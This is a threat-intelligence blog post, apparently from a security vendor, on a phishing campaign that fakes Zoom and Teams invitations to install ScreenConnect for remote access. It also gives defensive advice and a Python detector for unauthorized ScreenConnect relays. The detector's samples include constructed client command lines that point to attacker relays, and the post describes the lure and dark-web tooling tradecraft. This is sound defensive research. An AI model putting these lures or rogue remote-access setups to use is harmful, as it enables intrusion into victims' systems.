ScreenConnect Abuse Highlights the Risks of Trusted IT Tools
Phishing attacks impersonate Zoom and Teams to deliver ScreenConnect, exploiting the legitimate IT tool for stealthy, persistent system access.
August 26, 2025

It’s no longer just about stolen credentials.
An ongoing phishing campaign is targeting organizations across multiple industries, using sophisticated social engineering tactics to convincingly impersonate well-known videoconferencing platforms and deploy ConnectWise ScreenConnect for unauthorized system access.
Unlike traditional credential-harvesting attacks that steal login information, this campaign deceives targets into downloading legitimate remote monitoring and management (RMM) software, granting cybercriminals complete control over end-user devices.
This blog highlights key findings from our latest Threat Intelligence Report, Weaponizing Workplace Communications. It provides an overview of how these attacks unfold, why they are particularly dangerous, and what organizations must do to defend against them.
Phishing Lures Disguised as Meeting Invitations
The attack is a carefully orchestrated sequence that exploits everyday user habits and the trust organizations place in their collaboration and IT tools. By mimicking expected business workflows at each stage, attackers minimize red flags for targets and keep up the appearance of legitimate business activity while establishing persistent, covert access.
The multi-stage attack is initiated via phishing emails that are designed to appear as routine business communications or friendly correspondence—leveraging familiar branding and timely context to maximize believability.
Among the most common tactics we observed in this campaign is attackers disguising the initial phishing email as a Zoom meeting invitation. The email’s subject line references a seemingly legitimate purpose—for example, “Meeting Invite - 2024 Tax Organizer SID:80526353241,” tying in timely tax season relevance to make the message feel even more genuine.

It features familiar Zoom branding and vague language meant to trick the recipient into clicking the "View Invitation" button. The email also originates from a compromised legitimate account rather than a spoofed sender, so it passes SPF, DKIM, and DMARC checks, lending credibility and reducing the chance of detection by security tools that key on sender authentication.
In this particular instance, the attackers appear to have found a real Zoom notification email and modified only the call-to-action (CTA) to further enhance the illusion of authenticity. Once the CTA is clicked, the target is redirected to a malicious site where the second stage of the attack is initiated.
Zoom isn’t the only videoconferencing platform that bad actors opt to impersonate. We also uncovered malicious emails posing as Microsoft Teams invitations.

Similar to the fabricated Zoom emails, the fake Teams invitation was likely sent from a compromised account and features minimal text, along with a prominent call-to-action button. Clicking on the embedded link redirects the target to a malicious site that prompts them to download what appears to be the latest version of Microsoft Teams but is, in reality, ScreenConnect.
Deployment of ScreenConnect
The deployment process reflects a deep understanding of the technical and psychological factors that influence user behavior. Attackers combine legitimate-looking interfaces with urgent messaging, minimizing suspicion while maximizing the likelihood of successful installation.
The primary tactic involves redirecting targets to a malicious site hosted on a vercel.app subdomain, the free deployment domain Vercel gives to projects. The page, mimicking Zoom's interface, claims the latest version of Zoom isn't installed and that the newest version will automatically download.

Within seconds, the site opens a new browser tab, prompting the download of Zoom.ClientSetup.exe. But this isn’t a legitimate Zoom installer. The file is, in fact, ScreenConnect.

The phishing page was likely built using Vercel's v0, an AI-powered tool that helps developers build complete user interfaces from text prompts—essentially functioning as an automated designer and front-end developer. v0 transforms basic ideas into production-ready layouts in minutes, eliminating the need for extensive coding and design expertise.
A more direct deployment method involves embedding actual ScreenConnect session links directly within phishing emails, creating an immediate pathway to system compromise. This technique takes advantage of the fact that many organizations already have ScreenConnect installed for legitimate remote support purposes, allowing threat actors to skip the installation step entirely.

When recipients click these links, they are immediately connected to a live ScreenConnect session controlled by the bad actor, assuming the software is already present on the target system. For targets without existing ScreenConnect installations, clicking these links triggers an automatic download prompt for the ScreenConnect client software.
Account Takeover and Lateral Phishing
The weaponization of ScreenConnect's intended functionality gives threat actors the same level of access a legitimate IT administrator would have: remote control of the desktop, file transfer in both directions, and remote command execution, with the client running as a privileged background service. This means they can sidestep controls aimed at malware, navigate file systems, and establish a persistent presence across the organization's infrastructure.
Once initial system access is established, cybercriminals frequently pivot to lateral phishing campaigns that leverage the compromised environment to target additional victims. They analyze communication patterns, identify high-value targets, and craft phishing messages that appear to originate from trusted internal sources.

Because bad actors can send phishing emails directly from the target’s actual account, they can bypass security controls that might flag external phishing attempts. These emails often invite colleagues, partners, and business contacts to join “urgent” video conferences or access “critical” shared documents, ultimately leading to additional ScreenConnect deployments.
Attackers may also use the compromised access to modify existing email threads, inserting malicious links into ongoing legitimate conversations about meetings or document sharing. This technique exploits the natural tendency for users to trust communications that appear to be continuations of established business discussions.
Dark Web Enablement and Tooling
The rise in ScreenConnect-enabled cyberattacks is closely tied to a growing dark web ecosystem that supports the deployment, maintenance, and monetization of the RMM tool. This underground economy caters to both novice and more advanced threat actors, offering a range of services from pre-packaged kits to fully customized infrastructure.
Cybercriminals can acquire ScreenConnect in numerous forms across forums, encrypted messaging apps, and anonymous web pages. One of the most popular offerings is the "ScreenConnect REVOLUTION PACK V2.0," which includes a ScreenConnect agent bundled with hidden VNC (hVNC, a remote desktop session invisible to the logged-in user), cryptocurrency wallet checkers, and a suite of security bypasses. This pack also includes features to hide attacker activity during remote sessions and restore connections even if domains are suspended, ensuring persistent access to compromised systems.
Other sellers offer turnkey deployments, such as full ScreenConnect infrastructure hosted on virtual private servers with HTTPS certificates, relay links, asset grouping, and role-based access. Vendors also provide “lifetime source kits,” enabling mid-tier attackers to host their own infrastructure and bypass traditional detection methods.
Beyond tooling, threat actors rely on bulletproof hosting providers, abuse trusted services like Cloudflare for obfuscation, and advertise loader kits that silently drop additional payloads after installation. Together, these offerings highlight a mature ecosystem that significantly lowers the barrier to entry and enables ScreenConnect-based compromises at scale.
Victimology of ScreenConnect Abuse Attacks
Abnormal researchers discovered that this phishing campaign has targeted over 900 organizations across a broad spectrum of industries and geographic regions.
Education and religious organizations represent the largest segment at 14.4% of targets, followed by healthcare and pharmaceuticals at 9.7%, and financial services at 9.4%. This relatively even distribution across sectors—with no single industry representing more than 15% of targets—suggests attackers are prioritizing broad coverage over specialized targeting.
Geographically, most affected organizations were based in the United States, with notable presence from Canadian, Australian, and UK organizations—demonstrating the global scope of this threat campaign.
Given the diverse social engineering techniques employed, the emphasis on lateral phishing post-compromise, and the commoditized nature of ScreenConnect tools in criminal marketplaces, this activity appears primarily focused on establishing widespread network access for potential resale or follow-on monetization rather than targeted espionage or sector-specific data theft.
A Systematic Misuse of Trust
This campaign represents a significant evolution in cybercrime tactics. These ScreenConnect-enabled compromises weaponize a trusted IT administration tool, one designed to grant IT professionals deep system access for troubleshooting and maintenance. Because the client is a legitimately signed binary from a real vendor, antivirus and EDR rarely flag it on its own; detection has to rely on context, such as who installed it and which relay host it connects to, which significantly complicates detection and response efforts.
Simultaneously, the psychological sophistication of leveraging familiar videoconferencing contexts and established relationships capitalizes on fundamental human vulnerabilities, manipulating targets into granting attackers access to their devices.
The maturity of the supporting criminal ecosystem—evidenced by tiered service offerings, bulletproof hosting solutions, and comprehensive evasion techniques—indicates that ScreenConnect abuse is not an isolated phenomenon but rather a systematic exploitation of trust in modern business communications.
Closing the Door on ScreenConnect Exploitation
The campaign serves as a critical reminder that modern threats increasingly turn trusted systems against organizations rather than circumvent them. To counter this trend, security leaders must adopt a multi-layered defense strategy that combines people, processes, and technology.
Implement Advanced Email Security: Deploy AI-powered solutions capable of detecting the complex social engineering tactics that bypass traditional controls.
Enhance Endpoint Monitoring: Establish comprehensive monitoring for legitimate remote access tools. Inventory which RMM products and instances IT actually uses, alert on installations that were not deployed by IT, and flag clients that connect to relay hosts other than your own instance or that run from unexpected locations such as a user's Downloads folder.
Strengthen Security Awareness: Update training programs to reflect the evolving tactics of legitimate software abuse and the psychological manipulation techniques employed by modern attackers.
Taken together, these measures build resilience against the growing misuse of trusted tools like ScreenConnect and help reduce organizational exposure to campaigns that rely on both technical stealth and psychological manipulation.
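The endpoint-monitoring recommendation above, and the session-link deployment path described earlier, both come down to one question: is a given ScreenConnect client one that IT deployed, talking to IT's relay? The following Python is an added example, not code from the report or from ConnectWise. It assumes the widely documented shape of a ScreenConnect client's service command line (the executable followed by a quoted query string of the form "?e=Access&y=Guest&h=<relay host>&p=<port>&s=<session id>&k=<key>") and triages such lines against an allowlist of authorized relays. The sample command lines, hostnames, session IDs, key fragments, and the authorized relay name are all constructed for the example.

```python
"""Triage ScreenConnect client command lines against an allowlist of authorized relays.

Added example (not from the report). Assumes the documented ScreenConnect client
command-line shape: <client exe> "?e=<session type>&y=Guest&h=<relay>&p=<port>&s=<id>&k=<key>".
All sample values below are constructed.
"""
import ipaddress
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs

# The quoted query-string argument the client is started with.
SC_QUERY_RE = re.compile(r'"\?(e=[^"]*)"')
# The (optionally quoted) executable path at the start of the command line.
IMAGE_RE = re.compile(r'^"?([^"]+?\.exe)"?', re.IGNORECASE)

# Relay host(s) of the organization's own ScreenConnect instance (assumed value).
AUTHORIZED_RELAYS = {"instance-corp-relay.screenconnect.com"}

# Constructed samples in the shape of Sysmon Event ID 1 / service ImagePath values.
SAMPLE_COMMAND_LINES = [
    # 1) legitimate IT-deployed client pointing at the corporate relay
    r'"C:\Program Files (x86)\ScreenConnect Client (0a1b2c3d4e5f6a7b)\ScreenConnect.ClientService.exe" '
    r'"?e=Access&y=Guest&h=instance-corp-relay.screenconnect.com&p=443&s=11111111-1111-1111-1111-111111111111&k=BgIAAACkAABSU0ExAAgAAAEAAQ"',
    # 2) self-hosted attacker relay addressed by bare IP, unattended "Access" session
    r'"C:\Program Files (x86)\ScreenConnect Client (ffeeddccbbaa9988)\ScreenConnect.ClientService.exe" '
    r'"?e=Access&y=Guest&h=198.51.100.23&p=8041&s=22222222-2222-2222-2222-222222222222&k=BgIAAACkAABSU0ExAAgAAAEAAQ"',
    # 3) a Zoom-named installer (as in the campaign) carrying ScreenConnect parameters
    r'"C:\Users\jdoe\Downloads\Zoom.ClientSetup.exe" '
    r'"?e=Support&y=Guest&h=relay.example-attacker.test&p=443&s=33333333-3333-3333-3333-333333333333&k=BgIAAACkAABSU0ExAAgAAAEAAQ"',
    # 4) the real Zoom client, which must not be flagged
    r'"C:\Users\jdoe\AppData\Roaming\Zoom\bin\Zoom.exe" --some-flag',
]


@dataclass
class Finding:
    image: str
    relay_host: str
    relay_port: str
    session_type: str  # "Access" = unattended persistent access, "Support" = on-demand session
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_screenconnect_cmdline(cmdline: str):
    """Return (image_path, params) if the command line carries a ScreenConnect
    client query string; return None for any other process."""
    q = SC_QUERY_RE.search(cmdline)
    if not q:
        return None
    img = IMAGE_RE.match(cmdline)
    params = {k: v[0] for k, v in parse_qs(q.group(1)).items()}
    return (img.group(1) if img else ""), params


def triage(cmdline: str, authorized_relays: set) -> "Finding | None":
    """Score one command line. A Finding with no reasons is an authorized client."""
    parsed = parse_screenconnect_cmdline(cmdline)
    if parsed is None:
        return None
    image, params = parsed
    host = params.get("h", "")
    finding = Finding(image, host, params.get("p", ""), params.get("e", ""))
    if host.lower() not in {h.lower() for h in authorized_relays}:
        finding.reasons.append(f"relay {host!r} is not an authorized ScreenConnect relay")
    try:
        ipaddress.ip_address(host)  # attacker-hosted relays are often bare IPs
        finding.reasons.append("relay addressed by bare IP rather than a hostname")
    except ValueError:
        pass
    exe_name = image.rsplit("\\", 1)[-1]
    if "screenconnect" not in exe_name.lower():
        finding.reasons.append(f"binary {exe_name!r} does not identify itself as ScreenConnect")
    return finding


def scan(cmdlines, authorized_relays=AUTHORIZED_RELAYS):
    """Return only the suspicious findings from a batch of command lines."""
    findings = (triage(c, authorized_relays) for c in cmdlines)
    return [f for f in findings if f is not None and f.suspicious]


if __name__ == "__main__":
    for f in scan(SAMPLE_COMMAND_LINES):
        print(f"{f.session_type:8} {f.relay_host}:{f.relay_port}  {f.image}")
        for r in f.reasons:
            print(f"    - {r}")
```

In practice the command lines would be pulled from process-creation telemetry or from the ImagePath of services named "ScreenConnect Client (...)" rather than from a hard-coded list, and the allowlist would hold the relay hostnames of every instance IT has sanctioned. The check on the relay host is the important one: the signed binary looks identical whether IT or an attacker deployed it, so only where it connects tells you which.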
To explore the full set of findings—including detailed attack methodologies, technical obfuscation tactics, and a complete breakdown of the dark web ecosystem powering this campaign—download the report.
Download Weaponizing Workplace Communications: How Videoconferencing Impersonation and AI Exploitation Enable Malicious ScreenConnect Deployment today.